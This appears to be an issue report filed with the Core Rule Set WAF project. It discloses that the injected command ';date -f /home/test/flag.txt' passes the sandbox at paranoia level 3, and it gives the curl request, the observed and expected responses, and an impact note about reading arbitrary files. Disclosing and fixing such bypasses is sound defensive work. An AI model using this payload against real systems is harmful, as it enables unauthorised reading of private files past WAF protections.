RCE bypass via the date command #4388
Description
Hello, Everyone
I tried this bypass.
C:\Users\RelunSec>curl -ig -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level: 3" --data-urlencode "q=;date -f /home/test/flag.txt" "https://sandbox.coreruleset.org/"Observed behavior/Response:
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2025 07:47:18 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
X-Unique-ID: aUj3hp-Wah1OgdCxchC5KgAAAIE
x-backend: apache-latest
x-crs-last-commit: noneExpected behavior/Response:
HTTP/1.1 403 Forbidden
Date: Mon, 22 Dec 2025 07:47:18 GMT
Content-Type: text/plain; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
X-Unique-ID: aUj6wt6Zvfw_C_zpED5j9gAAAUI
x-backend: apache-latest
x-crs-last-commit: none
932236 PL2 Remote Command Execution: Unix Command Injection (command without evasion)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)
980170 PL? Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=0-5-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=5, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=5)Even PL3 the highest level and mostly used in critical services vulnerable to this bypass.
Impact:
The attacker do not need nothing date is already installed in linux and an attacker can read files even other is blocked an attacker can brute force available home files or read files that are not blocked by the WAF, if the .ssh dir blocked an attacker can read /home/testuser/InternalTestReportsCompany.txt without it blocked because it is a custom file.